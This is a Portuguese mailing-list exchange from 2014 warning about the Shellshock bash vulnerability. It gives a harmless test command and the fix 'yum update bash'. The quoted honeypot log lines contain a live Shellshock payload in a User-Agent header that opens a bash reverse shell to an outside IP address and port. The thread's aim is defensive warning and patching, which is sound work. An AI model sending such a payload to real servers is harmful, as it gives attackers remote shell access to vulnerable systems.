Boa Noite Flavio
Segue uma dica pra verificar se o servidor está vulnerável:
env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"
*Dica divulgada pela DigitalOcean.
Pra resolver é só realizar update do bash: yum update bash
[image: Sua Foto] <[email protected]>Rafael S. SaraivaPorto Alegre - RS
| Mobile: (51) 8174-7956
<http://br.linkedin.com/pub/rafael-saraiva/52/aab/230>
<https://plus.google.com/u/0/+RafaelSaraivaRS>
Em 26 de setembro de 2014 15:11, Flavio Goncalves <[email protected]>
escreveu:
> Caros amigos,
>
> A vulnerabilidade do bash conhecida como shellshock foi descoberta
> recentemente e divulgada ontem. Ela permite a execução de comandos remotos
> nos servidores através dos servidores http. Os nossos honeypots já estão
> detectando usuários explorando esta vulnerabilidade hoje. Não percam tempo
> em atualizar os servidores e evitem fraudes.
>
> Exemplo do que estamos detectando neste exato momento:
>
> [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;};
> /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
> [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0"
> 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/
> 195.225.34.14/3333 0>&1'"
>
> Att,
>
> Flavio E. Goncalves
>
>
> _______________________________________________
> WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto
> e RIO DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de
> BRINDES.
> Garanta a sua vaga e saiba mais em: www.workoffee.com.br
> _______________________________________________
> ALIGERA – Fabricante e desenvolvedor nacional de Soluções para telefonia
> IP .
> Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
> Banco de Canais Analógicos – Appliance Asterisk Acesse www.aligera.com.br
> _______________________________________________
> DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e
> FXS para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
> Construa soluções de PABX IP com produtos DigiVoice - visite
> www.digivoice.com.br
> _______________________________________________
> Para remover seu email desta lista, basta enviar um email em branco para
> [email protected]
>
_______________________________________________
WORKOFFEES KHOMP: Eventos KHOMP na sua cidade. BRASÍLIA, dia 28 de agosto e RIO
DE JANEIRO, dia 04 de setembro. Inscrições GRATUITAS e sorteio de BRINDES.
Garanta a sua vaga e saiba mais em: www.workoffee.com.br
_______________________________________________
ALIGERA Fabricante e desenvolvedor nacional de Soluções para telefonia IP .
Gateway Sip, Placas de 1E1, 2E1, 4E1 e 8E1 para PCI ou PCI Express.
Banco de Canais Analógicos Appliance Asterisk Acesse www.aligera.com.br
_______________________________________________
DIGIVOICE: Fabricante pioneiro em Banco de Canais e Placas E1, GSM, FXO e FXS
para Asterisk e Elastix. Temos Cursos de Telefonia IP e Asterisk.
Construa soluções de PABX IP com produtos DigiVoice - visite
www.digivoice.com.br
_______________________________________________
Para remover seu email desta lista, basta enviar um email em branco para
[email protected]
